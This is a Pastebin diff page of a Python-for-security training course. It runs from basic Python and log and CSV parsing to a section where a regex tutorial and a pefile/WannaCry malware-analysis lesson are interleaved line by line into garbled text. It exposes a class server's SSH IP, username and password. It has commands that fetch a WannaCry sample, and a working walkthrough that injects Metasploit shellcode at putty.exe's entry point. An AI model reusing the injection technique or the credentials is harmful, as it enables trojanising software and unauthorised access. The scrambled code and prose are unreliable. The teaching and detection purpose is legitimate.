View difference between Paste ID: <a href="/F02PntLy">F02PntLy</a> and <a href="/dM03J8jB">dM03J8jB</a> - Pastebin.com

View difference between Paste ID: F02PntLy and dM03J8jB

SHOW: | | - or go back to the newest paste.

                            ##############################
----------- ############### # Day 1: Python Fundamentals # ############### -----------
                            ##############################


####################
#####################
# Installing Python#
# Installing Python #
####################
#####################
Windows

https://www.python.org/downloads/

32-Bit Version
https://www.python.org/ftp/python/3.7.3/python-3.7.3-webinstall.exe

64-Bit Version
https://www.python.org/ftp/python/3.7.3/python-3.7.3-amd64-webinstall.exe


After you install Python in Windows the next thing you may want to install is IdleX:
http://idlex.sourceforge.net/features.html

---------------------------Type This-----------------------------------

Linux
Debian/Ubuntu:		sudo apt-get install -y python
RHEL/CentOS/Fedora:	sudo yum install -y python 

-----------------------------------------------------------------------


After you install Python in Linux the next thing that you will need to do is install idle. 

---------------------------Type This-----------------------------------

sudo apt-get install -y idle

-----------------------------------------------------------------------

Open IDLE, and let's just dive right in.


- I prefer to use Putty to SSH into my Linux host.
- You can download Putty from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
 
Here is the information to put into putty
 
Host Name:          107.191.39.106
protocol:           ssh
port:               22
username:           sempra
password:           semprapython3!    


####################################
# Python Lesson 1: Simple Printing #
####################################
 
---------------------------Type This-----------------------------------
$ python3
 
>>> print ("Today we are learning Python.")
 
>>> exit()
-----------------------------------------------------------------------
 
 
 
 
############################################
# Python Lesson 2: Simple Numbers and Math #
############################################
 
---------------------------Type This-----------------------------------
$ python3
 
>>> 2+2
 
>>> 6-3
 
>>> 18/7
 
>>> 18.0/7
 
>>> 18.0/7.0
 
>>> 18/7
 
>>> 9%4
1
>>> 8%4
0
>>> 8.75%.5
 
>>> 6.*7
 
>>> 7*7*7
 
>>> 7**3
 
>>> 5**12
 
>>> -5**4
 
>>> exit()
 
-----------------------------------------------------------------------
 
 
 
##############################
# Python Lesson 3: Variables #
##############################
 
---------------------------Type This-----------------------------------
$ python3
 
>>> x=18
 
>>> x+15
 
>>> x**3
 
>>> y=54
 
>>> g=int(input("Enter number here: "))
Enter number here: 43
>>> g
 
>>> g+32
 
>>> g**3
 
>>> exit()
 
-----------------------------------------------------------------------
 
 
 
 
 
##########################################
# Python Lesson 4: Modules and Functions #
##########################################
 
---------------------------Type This-----------------------------------
$ python3
 
>>> 5**4
 
>>> pow(5,4)
 
>>> abs(-18)
 
>>> abs(5)
 
>>> floor(18.7)
 
>>> import math
 
>>> math.floor(18.7)
 
>>> math.sqrt(81)
 
>>> joe = math.sqrt
 
>>> joe(9)
 
>>> joe=math.floor
 
>>> joe(19.8)
 
>>> exit()
 
-----------------------------------------------------------------------
 
 
 
############################
# Python Lesson 5: Strings #
############################
 
---------------------------Type This-----------------------------------
$ python3
 
>>> "XSS"
 
>>> 'SQLi'
 
>>> "Joe's a python lover"
 
>>> "Joe said \"InfoSec is fun\" to me"
 
>>> a = "Joe"
 
>>> b = "McCray"
 
>>> a, b
 
>>> a+b
 
>>> exit()
-----------------------------------------------------------------------
 
 
 
 
 
#################################
# Python Lesson 6: More Strings #
#################################
 
---------------------------Type This-----------------------------------
$ python3
 
>>> num = 10
 
>>> num + 2
 
>>> "The number of open ports found on this system is ",  num
 
>>> num = str(18)
 
>>> "There are ", num, " vulnerabilities found in this environment."
 
>>> num2 = 46
 
>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is ", + num2
 
>>> exit()
-----------------------------------------------------------------------
 
 
 
 
 
########################################
# Python Lesson 7: Sequences and Lists #
########################################
 
---------------------------Type This-----------------------------------
$ python3
 
>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
 
>>> attacks
['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
 
>>> attacks[3]
'SQL Injection'
 
>>> attacks[-2]
'Cross-Site Scripting'
 
>>> exit()



------------------------------- Summary of fundamentals -------------------------------


Joe rule #1 single quote, single quote, left arrow
--------------------------------------------------
'' <-- as soon as you type '', then hit your left arrow key to put you inside of the '' 
"" <-- as soon as you type "", then hit your left arrow key to put you inside of the ""
something()	<-- as soon as you type (), then hit your left arrow key to put you inside of the ()
something[] <-- as soon as you type [], then hit your left arrow key to put you inside of the []
something{} <-- as soon as you type {}, then hit your left arrow key to put you inside of the {}

-- Now kick it up a notch
[]	<-- as soon as you type [], then hit your left arrow key to put you inside of the []
[()] <-- as soon as you type (), then hit your left arrow key to put you inside of the ()
[({})] <-- as soon as you type {}, then hit your left arrow key to put you inside of the {}
[({"''"})] <-- as soon as you type "", then hit your left arrow key to put you inside of the "" 
[({"''"})] <-- as soon as you type '', then hit your left arrow key to put you inside of the '' 		



Joe rule #2 "Code can only do 3 things"
--------------------------------------

Process		- 	read, write, math

Decision	- 	if/then

Loop		- 	for




Joe rule #3 "Never more than 5-10"
---------------------------------

-----5 lines of code----
line 1 blah blah blah
line 2 blah blah blah
line 3 blah blah blah
line 4 blah blah blah
line 5 blah blah blah


	sales_tax	= 	price		* 	tax_rate


	0.80		=	10		*	0.08

-----5-10 lines of code---- = function
	price = 10
	
	def st():
		sales_tax = price * 0.08
		print(sales_tax)


st(10) <---- how to run a function

-----5-10 functions ---- = class   "tax class"
st()
lt()
pt()
it()
dt()



tax.st()
tax.lt()

-----5-10 functions ---- = class   "expense class"
gas()
elec()
water()
food()
beer()

expense.gas()


-----5-10 classes ---- = module   "finance module"

import finance


------------------------------- Summary of fundamentals ------------------------------- 
 
##################################
# Lesson 8: Intro to Log Analysis #
##################################
 
 
Log into your Linux host then execute the following commands:
-----------------------------------------------------------------------
NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.
 
 
 
---------------------------Type This-----------------------------------
mkdir yourname          <---- Use your actual first name (all lowercase and no spaces) instead of the word yourname
 
cd yourname
 
wget http://pastebin.com/raw/85zZ5TZX
 
mv 85zZ5TZX access_log
 
 
cat access_log | grep 141.101.80.188

cat access_log | grep 141.101.80.188 | wc -l
 
cat access_log | grep 141.101.80.187

cat access_log | grep 141.101.80.187 | wc -l
 
cat access_log | grep 108.162.216.204

cat access_log | grep 108.162.216.204 | wc -l
 
cat access_log | grep 173.245.53.160

cat access_log | grep 173.245.53.160 | wc -l
 
----------------------------------------------------------------------
 
 

 
 
 
 
###############################################################
# Python Lesson 9: Use Python to read in a file line by line  #
###############################################################
 
 
---------------------------Type This-----------------------------------
 
nano logread1.py
 
 
---------------------------Paste This-----------------------------------
## Open the file with read only permit
f = open('access_log', "r")
 
## use readlines to read all lines in the file
## The variable "lines" is a list containing all lines
lines = f.readlines()
 
print (lines)
 
 
## close the file after reading the lines.
f.close()
 
----------------------------------------------------------------------
 
 
 
 
---------------------------Type This-----------------------------------
$ python3 logread1.py
----------------------------------------------------------------------
 
 
 
Google the following:
    - python difference between readlines and readline
    - python readlines and readline
 
 
Here is one student's solution - can you please explain each line of this code to me?
 
 
---------------------------Type This-----------------------------------
nano ip_search.py
 

---------------------------Paste This-----------------------------------
#!/usr/bin/env python3
 
f = open('access_log')
 
strUsrinput = input("Enter IP Address: ")
 
for line in iter(f):
   ip = line.split(" - ")[0]
   if ip == strUsrinput:
       print (line)
 
f.close()
 
 
----------------------------------------------------------------------
 
 
 
 
---------------------------Type This-----------------------------------
$ python3 ip_search.py
----------------------------------------------------------------------
 
 
 
Working with another student after class we came up with another solution:
 
---------------------------Type This-----------------------------------
nano ip_search2.py
 
---------------------------Paste This-----------------------------------
#!/usr/bin/env python

 
 
# This line opens the log file
f=open('access_log',"r")
 
# This line takes each line in the log file and stores it as an element in the list
lines = f.readlines()
 
 
# This lines stores the IP that the user types as a var called userinput
userinput = input("Enter the IP you want to search for: ")
 
 
 
# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
for ip in lines:
   if ip.find(userinput) != -1:
       print (ip)
 
----------------------------------------------------------------------
 
 
 
---------------------------Type This-----------------------------------
$ python3 ip_search2.py
----------------------------------------------------------------------
 
 
################################
# Lesson 10: Parsing CSV Files #
################################
 
Type the following commands:
---------------------------------------------------------------------------------------------------------
 
---------------------------Type This-----------------------------------
 
wget http://45.63.104.73/class_nessus.csv
 
----------------------------------------------------------------------
 
Example 1 - Reading CSV files
-----------------------------
#To be able to read csv formated files, we will first have to import the
#csv module.
 
 
---------------------------Type This-----------------------------------
$ python3
f = open('class_nessus.csv', 'r')
for row in f:
   print (row)
       
 
----------------------------------------------------------------------
 
 
 
Example 2 - Reading CSV files
-----------------------------
 
---------------------------Type This-----------------------------------
 
nano readcsv.py
 
---------------------------Paste This-----------------------------------
#!/usr/bin/env python3
f = open('class_nessus.csv', 'r')      # opens the csv file
try:
    for row in f:           			# iterates the rows of the file in orders
        print (row)             		# prints each row
finally:
    f.close()               			# closing
 
 
 
----------------------------------------------------------------------
 
 
 
Ok, now let's run this thing.
 
--------------------------Type This-----------------------------------
$ python3 readcsv.py
 
----------------------------------------------------------------------
 
 
 
 
Example 3 - - Reading CSV files
-------------------------------
 
---------------------------Type This-----------------------------------
 
nano readcsv2.py
 
---------------------------Paste This-----------------------------------
#!/usr/bin/python3
# This program will then read it and displays its contents.
  
import csv
 
ifile  = open('class_nessus.csv', "r")
reader = csv.reader(ifile)
 
rownum = 0
for row in reader:
    # Save header row.
    if rownum == 0:
        header = row
    else:
        colnum = 0
        for col in row:
            print ('%-8s: %s' % (header[colnum], col))
            colnum += 1
           
    rownum += 1
 
ifile.close()
 
 
 
----------------------------------------------------------------------
 
 
 
---------------------------Type This-----------------------------------
 
$ python3 readcsv2.py | less
 
 
----------------------------------------------------------------------
 
 
 
 
 
 
 
 
 
---------------------------Type This-----------------------------------
 
nano readcsv3.py
 
---------------------------Paste This-----------------------------------
#!/usr/bin/python3
import csv
f = open('class_nessus.csv', 'r')
try:
    rownum = 0
    reader = csv.reader(f)
    for row in reader:
         #Save header row.
        if rownum == 0:
            header = row
        else:
            colnum = 0
            if row[3].lower() == 'high':
                print ('%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]))
        rownum += 1
finally:
    f.close()
 
-----------------------------------------------------------------------
 
 
---------------------------Type This-----------------------------------
 
$ python3 readcsv3.py | less
-----------------------------------------------------------------------
 
 
 
---------------------------Type This-----------------------------------
 
nano readcsv4.py
-----------------------------------------------------------------------
 
---------------------------Paste This-----------------------------------
 
#!/usr/bin/python3
import csv
f = open('class_nessus.csv', 'r')
try:
    print ('/---------------------------------------------------/')
    rownum = 0
    hosts = {}
    reader = csv.reader(f)
    for row in reader:
        # Save header row.
        if rownum == 0:
            header = row
        else:
            colnum = 0
            if row[3].lower() == 'high' and row[4] not in hosts:
                hosts[row[4]] = row[4]
                print ('%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]))
        rownum += 1
finally:
    f.close()
----------------------------------------------------------------------
 
 
 
$ python3 readcsv4.py | less
 
----------------------------------------------------------------------


                            ######################################################

----------- ############### # Day 2: Regular Expressions, Functions, and Classes # ############### -----------

                            ######################################################



# Regular Expressions #

----------- ############### # Day 2: Malware analysis with Python # ############### -----------
                            #######################################
Here is the information to put into putty
 
**************************************************

* What is Regular Expression and how is it used? *

**************************************************

username:           sempra
password:           semprapython3! 
Simply put, regular expression is a sequence of character(s) mainly used to find and replace patterns in a string or file.


file wannacry.exe 
Regular expressions use two types of characters:

objdump -x wannacry.exe
a) Meta characters: As the name suggests, these characters have a special meaning, similar to * in wildcard.

strings wannacry.exe
b) Literals (like a,b,1,2…)

strings --all wannacry.exe | head -n 6
 
In Python, we have module "re" that helps with regular expressions. So you need to import library re before you can use regular expressions in Python.

 
strings wannacry.exe | grep -i library
Use this code --> import re

strings wannacry.exe | grep -i reg
 
strings wannacry.exe | grep -i key
 
The most common uses of regular expressions are:

 
strings wannacry.exe | grep -i open
- Search a string (search and match)

- Finding a string (findall)

- Break string into a sub strings (split)

- Replace part of a string (sub)

 
strings wannacry.exe | grep -i irc
 
Let's look at the methods that library "re" provides to perform these tasks.

 
strings wannacry.exe | grep -i admin
 
****************************************************

* What are various methods of Regular Expressions? *

****************************************************

pe info wannacry.exe
pe check wannacry.exe
The ‘re' package provides multiple methods to perform queries on an input string. Here are the most commonly used methods, I will discuss:
pe dump --section text wannacry.exe
pe dump --section data wannacry.exe
re.match()
pe dump --section rsrc wannacry.exe
re.search()
pe dump --section reloc wannacry.exe
re.findall()
strings rdata | less
re.split()
strings rsrc | less
re.sub()
strings text | less
re.compile()


Let's look at them one by one.

# How do we do this with Python3 #
##################################
re.match(pattern, string):

-------------------------------------------------
Reference page:
https://axcheron.github.io/pe-format-manipulation-with-pefile/
This method finds match if it occurs at start of the string. For example, calling match() on the string ‘AV Analytics AV' and looking for a pattern ‘AV' will match. However, if we look for only Analytics, the pattern will not match. Let's perform it in python now.

---------------------------Type This-----------------------------------
Code
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

python3
import re
import pefile
result = re.match(r'AV', 'AV Analytics ESET AV')

print (result)
exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name

try:
Output:
    pe = pefile.PE(exe_path)
<_sre.SRE_Match object at 0x0000000009BE4370>
    # This is also a valid function call
    # pe = pefile.PE(name=exe_path)
Above, it shows that pattern match has been found. To print the matching string we'll use method group (It helps to return the matching string). Use "r" at the start of the pattern string, it designates a python raw string.
except OSError as e:
    print(e)
except pefile.PEFormatError as e:
    print("[-] PEFormatError: %s" % e.value)
import re

result = re.match(r'AV', 'AV Analytics ESET AV')

print (result.group(0))


It’s also possible to parse raw PE data by using data as parameter.
Output:

AV
import pefile
import mmap

Let's now find ‘Analytics' in the given string. Here we see that string is not starting with ‘AV' so it should return no match. Let's see what we get:
exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name


Code
fd = open(exe_path, 'rb')				# Map the executable in memory
pe_data = mmap.mmap(fd.fileno(), 0, access=mmap.ACCESS_READ)

import re

result = re.match(r'Analytics', 'AV Analytics ESET AV')
pe = pefile.PE(data=pe_data)			# Parse the data contained in the buffer
print (result)

-----------------------------------------------------------------------



Output:

None

---------------------------Type This-----------------------------------
import pefile
There are methods like start() and end() to know the start and end position of matching pattern in the string.

exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
Code

pe = pefile.PE(exe_path, fast_load=True)

import re
# Then you can call the following method later in your code
result = re.match(r'AV', 'AV Analytics ESET AV')
pe.full_load()
print (result.start())

print (result.end())



Reading the Header Members
Output:
Once the executable is successfully parsed, the data is readily available as attributes of the PE instance. Let’s read the following attributes:

2
e_magic or IMAGE_DOS_HEADER. It should be equal to 0x5A4D (MZ)
signature or IMAGE_NT_HEADERS. It should be equal to 0x4550 (PE)
Above you can see that start and end position of matching pattern ‘AV' in the string and sometime it helps a lot while performing manipulation with the string.

import pefile

exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
pe = pefile.PE(exe_path)

re.search(pattern, string):
print("[*] e_magic value: %s" % hex(pe.DOS_HEADER.e_magic))
-----------------------------------------------------
print("[*] Signature value: %s" % hex(pe.NT_HEADERS.Signature))
-----------------------------------------------------------------------

It is similar to match() but it doesn't restrict us to find matches at the beginning of the string only. Unlike previous method, here searching for pattern ‘Analytics' will return a match.


Code

If you want to enemuerate each members of a specific structure, like DOS_HEADER, it can easily be done by using a for loop.
---------------------------Type This-----------------------------------
import re
import pefile
result = re.search(r'Analytics', 'AV Analytics ESET AV')

print (result.group(0))
exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
pe = pefile.PE(exe_path)

Output:
print("[*] Listing DOS_HEADER fields...")
Analytics
for keys in pe.DOS_HEADER.__keys__:
	for field in keys:
Here you can see that, search() method is able to find a pattern from any position of the string but it only returns the first occurrence of the search pattern.
		print('\t' + field)
-----------------------------------------------------------------------





re.findall (pattern, string):
You can also diplay the full content of a structure by using the dump() method. It will returns a string representation of the structure.
---------------------------Type This-----------------------------------
import pefile

It helps to get a list of all matching patterns. It has no constraints of searching from start or end. If we will use method findall to search ‘AV' in given string it will return both occurrence of AV. While searching a string, I would recommend you to use re.findall() always, it can work like re.search() and re.match() both.
exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
pe = pefile.PE(exe_path)

Code
for field in pe.DOS_HEADER.dump():
    print(field)
-----------------------------------------------------------------------
import re

result = re.findall(r'AV', 'AV Analytics ESET AV')

print (result)

Data Directories
Now, we will list the Data Directories. Those directories contains address/size pairs for special tables that are found in the image file and are used by the operating system (for example, the import table and the export table). We can find the number of Data Directories in NumberOfRvaAndSizes located in the Optional Header struture.
Output:

['AV', 'AV']
import pefile

exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
pe = pefile.PE(exe_path)

print("[*] Number of data directories = %d" % pe.OPTIONAL_HEADER.NumberOfRvaAndSizes)
re.split(pattern, string, [maxsplit=0]):
for data_directory in pe.OPTIONAL_HEADER.DATA_DIRECTORY:
    print('\t' + data_directory.name)
-----------------------------------------------------------------------


This methods helps to split string by the occurrences of given pattern.


You can also display the address/size pairs of each of them:
Code

import pefile
exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
result=re.split(r'y','Analytics')
pe = pefile.PE(exe_path)
result

 ----------------------------------------------------------------------
for data_dir in pe.OPTIONAL_HEADER.DATA_DIRECTORY:
    print(data_dir)
Output:

['Anal', 'tics']


Above, we have split the string "Analytics" by "y". Method split() has another argument "maxsplit". It has default value of zero. In this case it does the maximum splits that can be done, but if we give value to maxsplit, it will split the string. Let's look at the example below:


Listing the Symbols
Code
Imports
To list the imported DLLs by the executable, we can iterate through the data directory DIRECTORY_ENTRY_IMPORT
---------------------------Type This-----------------------------------
import re
import pefile
result=re.split(r's','Analytics eset')

print (result)
exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
pe = pefile.PE(exe_path)

print("[*] Listing imported DLLs...")
Output:
for entry in pe.DIRECTORY_ENTRY_IMPORT:
['Analytic', ' e', 'et'] #It has performed all the splits that can be done by pattern "s".
    print('\t' + entry.dll.decode('utf-8'))
-----------------------------------------------------------------------


Code



import re
Then, we can list each imported function in a specific DLL, for example, kernel32.dll.
result=re.split(r's','Analytics eset',maxsplit=1)

print (result)
import pefile

exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
pe = pefile.PE(exe_path)
Output:

[]
for entry in pe.DIRECTORY_ENTRY_IMPORT:
    dll_name = entry.dll.decode('utf-8')
    if dll_name == "KERNEL32.dll":
        print("[*] Kernel32.dll imports:")
        for func in entry.imports:
            print("\t%s at 0x%08x" % (func.name.decode('utf-8'), func.address))
re.sub(pattern, repl, string):

----------------------------------------------------------


It helps to search a pattern and replace with a new sub string. If the pattern is not found, string is returned unchanged.

Listing the Sections
Code
Sections are added to a list accesible as the attribute sections in the PE instance. The common structure members of the section header are reachable as attributes.
---------------------------Type This-----------------------------------
import pefile
import re

result=re.sub(r'Ruby','Python','Joe likes Ruby')
exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
print (result)
pe = pefile.PE(exe_path)

for section in pe.sections:
Output:
    print(section.Name.decode('utf-8'))
''
    print("\tVirtual Address: " + hex(section.VirtualAddress))
    print("\tVirtual Size: " + hex(section.Misc_VirtualSize))
    print("\tRaw Size: " + hex(section.SizeOfRawData))
-----------------------------------------------------------------------


re.compile(pattern, repl, string):

----------------------------------------------------------
You can also dump the full content of a section by passing its index to sections
---------------------------Type This-----------------------------------
import pefile
We can combine a regular expression pattern into pattern objects, which can be used for pattern matching. It also helps to search a pattern again without rewriting it.

exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
pe = pefile.PE(exe_path)
Code

print pe.sections[0]
-----------------------------------------------------------------------
import re

pattern=re.compile('XSS')

result=pattern.findall('XSS is Cross Site Scripting, XSS')

print (result)

result2=pattern.findall('XSS is Cross Site Scripting, SQLi is Sql Injection')

print (result2)
Modifying the Structures
One of the most interesting functionality of pefile is editing executables. All values support assignment, so we can easily alter an executable. Let’s rename the .text section as an example:
---------------------------Type This-----------------------------------
import pefile
Output:

['XSS', 'XSS']
exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
['XSS']
pe = pefile.PE(exe_path)

Till now,  we looked at various methods of regular expression using a constant pattern (fixed characters). But, what if we do not have a constant search pattern and we want to return specific set of characters (defined by a rule) from a string?  Don't be intimidated.
print("[*] Original Section name = %s" % pe.sections[0].Name.decode('utf-8'))
print("[*] Editing values...\n")
This can easily be solved by defining an expression with the help of pattern operators (meta  and literal characters). Let's look at the most common pattern operators.

# Edit values
pe.sections[0].Name = ".axc".encode()

# Save the change in another executable
new_exe_path = r"C:\Users\User\Desktop\new_putty.exe"
**********************************************
pe.write(new_exe_path)
* What are the most commonly used operators? *

**********************************************
# Check the values
new_pe = pefile.PE(new_exe_path)
print("[*] New Section name = %s" % new_pe.sections[0].Name.decode('utf-8'))
Regular expressions can specify patterns, not just fixed characters. Here are the most commonly used operators that helps to generate an expression to represent required characters in a string or file. It is commonly used in web scrapping and  text mining to extract required information.


Operators   Description

.           Matches with any single character except newline ‘\n'.

?           match 0 or 1 occurrence of the pattern to its left

+           1 or more occurrences of the pattern to its left
Code Injection
*           0 or more occurrences of the pattern to its left
Now, let’s try to inject code into the executable. Here we will inject a shellcode at the entry point. It will corrupt the executable as we will overwrite the orginal code to execute the shellcode. To do this, we will use the set_bytes_at_offset() method. It overwrite the bytes at the given file offset with the given string, it takes 2 arguments:
\w          Matches with a alphanumeric character whereas \W (upper case W) matches non alphanumeric character.

\d          Matches with digits [0-9] and /D (upper case D) matches with non-digits.
Offset, containing the offset where we want to write the data
\s          Matches with a single white space character (space, newline, return, tab, form) and \S (upper case S) matches any non-white space character.
Data, the data…
\b          boundary between word and non-word and /B is opposite of /b

[..]            Matches any single character in a square bracket and [^..] matches any single character not in square bracket
import pefile
\           It is used for special meaning characters like \. to match a period or \+ for plus sign.

^ and $         ^ and $ match the start or end of the string respectively
exe_path = "/home/sempra/j0e/putty.exe"		# Make sure you change the file path to your name
{n,m}           Matches at least n and at most m occurrences of preceding expression if we write it as {,m} then it will return at least any minimum occurrence to max m preceding expression.
pe = pefile.PE(exe_path)
a| b            Matches either a or b

( )         Groups regular expressions and returns matched text
# msfvenom -p windows/messagebox -f py
\t, \n, \r  Matches tab, newline, return
# Payload size: 272 bytes
# Final size of py file: 1308 bytes
shellcode = bytes(b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9")
For more details on  meta characters "(", ")","|" and others details , you can refer this link (https://docs.python.org/2/library/re.html).
shellcode += b"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08"
shellcode += b"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1"
Now, let's understand the pattern operators by looking at the below examples.
shellcode += b"\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28"
shellcode += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34"
shellcode += b"\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84"
shellcode += b"\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24"
****************************************
shellcode += b"\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
* Some Examples of Regular Expressions *
shellcode += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c"
****************************************
shellcode += b"\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"
shellcode += b"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\x7e"
******************************************************
shellcode += b"\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89"
* Problem 1: Return the first word of a given string *
shellcode += b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68"
******************************************************
shellcode += b"\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"
shellcode += b"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
shellcode += b"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68"
Solution-1  Extract each character (using "\w")
shellcode += b"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c"
---------------------------------------------------------------------------
shellcode += b"\x24\x0a\x89\xe3\x68\x58\x20\x20\x20\x68\x4d\x53\x46"
shellcode += b"\x21\x68\x72\x6f\x6d\x20\x68\x6f\x2c\x20\x66\x68\x48"
Code
shellcode += b"\x65\x6c\x6c\x31\xc9\x88\x4c\x24\x10\x89\xe1\x31\xd2"
shellcode += b"\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08"

import re
ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
result=re.findall(r'.','Python is the best scripting language')
print("[*] Writting %d bytes at offset %s" % (len(shellcode), hex(ep)))
print (result)
pe.set_bytes_at_offset(ep, shellcode)

new_exe_path = r"/home/sempra/j0e/new_putty.exe"
Output:
pe.write(new_exe_path)
['P', 'y', 't', 'h', 'o', 'n', ' ', 'i', 's', ' ', 't', 'h', 'e', ' ', 'b', 'e', 's', 't', ' ', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', ' ', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']

By executing the new executable, you should see a message box indicating that the injection was successful.

Above, space is also extracted, now to avoid it use "\w" instead of ".".
Note: To generate the shellcode I used Metasploit.

Conclusion
Code
There are many other features you should try like matching PEiD signatures, but you should play be able to play with it on your own now. 


import re

result=re.findall(r'\w','Python is the best scripting language')

print (result)




Output:

['P', 'y', 't', 'h', 'o', 'n', 'i', 's', 't', 'h', 'e', 'b', 'e', 's', 't', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']



Indicators of Compromise (IoC)
-----------------------------
Solution-2  Extract each word (using "*" or "+")

---------------------------------------------------------------------------
1. Modify the filesystem
2. Modify the registry			- ADVAPI32.dll (persistance)
Code
3. Modify processes/services
4. Connect to the network		- WS2_32.dll

import re

result=re.findall(r'\w*','Python is the best scripting language')

print (result)
if you can't detect a registry change across 5% of your network



Output:
EDR Solution
['Python', '', 'is', '', 'the', '', 'best', '', 'scripting', '', 'language', '']
------------


Again, it is returning space as a word because "*" returns zero or more matches of pattern to its left. Now to remove spaces we will go with "+".
1. Static Analysis	<----------------------------------------- Cloud based static analysis
Learn everything I can without actually running the file
Code
	- Modify FS						- File integrity checker
	- Modify registry
	- Modify processes/services
import re
	- Connect to the network
result=re.findall(r'\w+','Python is the best scripting language')

print (result)


2. Dynamic Analysis
Runs the file in a VM/Sandbox
Output:

['Python', 'is', 'the', 'best', 'scripting', 'language']

# The Scenario #
################
You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
 
Solution-3 Extract each word (using "^")

-------------------------------------------------------------------------------------


 
Code

 
###################
import re

result=re.findall(r'^\w+','Python is the best scripting language')

print (result)

- After logging please open a terminal window and type the following commands:
---------------------------Type This-----------------------------------
 
Output:
cd ~/yourname
['Python']

wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
If we will use "$" instead of "^", it will return the word from the end of the string. Let's look at it.


Code

wget http://45.63.104.73/wannacry.zip
 
import re

result=re.findall(r'\w+$','Python is the best scripting language')

print (result)

file wannacry.exe
 
Output:

[‘language']

file malware.pdf
 
mv malware.pdf wannacry.exe
 
hexdump -n 2 -C wannacry.exe
**********************************************************

* Problem 2: Return the first two character of each word *

**********************************************************

 
 
***What is '4d 5a' or 'MZ'***
Reference:
Solution-1  Extract consecutive two characters of each word, excluding spaces (using "\w")

------------------------------------------------------------------------------------------------------

 
Code

---------------------------Type This-----------------------------------
 
import re

result=re.findall(r'\w\w','Python is the best')

print (result)

strings wannacry.exe
 
strings --all wannacry.exe | head -n 6
Output:

['Py', 'th', 'on', 'is', 'th', 'be', 'st']

 
strings wannacry.exe | grep -i library
 
strings wannacry.exe | grep -i reg
 
Solution-2  Extract consecutive two characters those available at start of word boundary (using "\b")

------------------------------------------------------------------------------------------------------

strings wannacry.exe | grep -i rsa
Code

strings wannacry.exe | grep -i open
 
import re

result=re.findall(r'\b\w.','Python is the best')

print (result)

 
strings wannacry.exe | grep -i irc
 
Output:

['Py', 'is', 'th', 'be']

strings wannacry.exe | grep -i admin
 
strings wannacry.exe | grep -i list
 
 
 
********************************************************

* Problem 3: Return the domain type of given email-ids *

********************************************************

 
 
To explain it in simple manner, I will again go with a stepwise approach:

 
 
 
Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
 
Solution-1  Extract all characters after "@"

------------------------------------------------------------------------------------------------------------------

 
Code

https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
 
import re

result=re.findall(r'@\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')

print (result)

Strings:
$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
Output: ['@gmail', '@test', '@strategicsec', '@rest']

$s3 = “.wcry” wide ascii nocase
$s4 = “WANNACRY” wide ascii nocase
$s5 = “WANACRY!” wide ascii nocase
Above, you can see that ".com", ".biz" part is not extracted. To add it, we will go with below code.

 
